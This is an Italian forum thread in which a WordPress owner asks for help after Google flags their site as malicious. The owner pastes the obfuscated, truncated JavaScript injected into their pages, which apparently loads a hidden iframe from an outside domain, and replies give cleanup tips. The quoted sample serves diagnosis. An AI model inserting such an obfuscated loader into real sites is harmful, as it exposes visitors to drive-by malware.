• User

    Malware sul mio sito wordpress...

    Ciao a tutti.
    ho provato con la ricerca del forum, ma sarà l'ansia per questo problema che non riesco neanche a ragionare per bene...
    Con alcuni browser (Chrome e Safari) risulta che il mio wp è infetto da ypyxwon.ru
    Difatti con gli strumenti di google webmaster ho una segnalazione in tutte le pagine... cliccando su queste segnalazioni google mi avverte che il codice potenzialmente pericoloso è:

    <script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+" 2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){f=['-3 1i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61 i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i -1i1i51i8i53i1i83i-27i-31i-31i-31i65i62i74i57i69i61i74i0i1i1 9i-27i-31i-31i85i-8i61i68i75i61i-8i83i-27i-31i-31i-31i60i71i 59i77i69i61i70i76i6i79i74i65i76i61i0i-6i20i65i62i74i57i69i61 i-8i75i74i59i21i-1i64i76i76i72i18i7i7i61i80i69i71i76i71i62i6 i74i77i7i59i71i77i70i76i15i6i72i64i72i-1i-8i79i65i60i76i64i2 1i-1i9i8i-1i-8i64i61i65i63i64i76i21i-1i9i8i-1i-8i75i76i81i68 i61i21i-1i78i65i75i65i58i65i68i65i76i81i18i64i65i60i60i61i70 i19i72i71i75i65i76i65i71i70i18i57i58i75i71i68i77i76i61i19i68 i61i62i76i18i8i19i76i71i72i18i8i19i-1i22i20i7i65i62i74i57i69 i61i22i-6i1i19i-27i-31i-31i85i-27i-31i-31i62i77i70i59i76i65i 71i70i-8i65i62i74i57i69i61i74i0i1i83i-27i-31i-31i-31i78i57i7 4i-8i62i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61 i29i68i61i69i61i70i76i0i-1i65i62i74i57i69i61i-1i1i19i62i6i75 i61i Ho provato subito a mettermi all'opera. - ho cercato sul web ed ho installato un plugin anti-malware per WP... installato, fatto scansioni... ma nulla - Ho fatto il backup del db, ho scaricato in locale l'intero sito ... ed ho aperto con dreamviewer uno ad uno i file di wp ... ma di questo codice nemmeno l'ombra. In cosa sto sbagliando? vi ringrazio a priori per l'aiuto.


  • User Attivo

    Ciao, hai provato a cercare nel file Wp-config.php, l'index di Wordpress o l'header del tema?


  • User Attivo

    Il mio sistema (un po casereccio ma funge)...
    Accedi tramite FTP e ordini per "ultima modifica"; dovrai farlo per tutte le cartelle singolarmente.
    Nella nuova disposizione t'è facile individuare i files infetti; infatti se non hai effettuato aggiornamenti di Wordpress, quelli infetti saranno gli ultimi modificati.
    Ovviamente procedi a modifica in locale tenendo presente che quasi sicuramente troverai questo codice aggiuntivo, ad inizio file.

    PS: il mio NOD32 non mi faceva accedere a questa pagina; prova ad utilizzare il tag CODICE imageinvece del quote!!!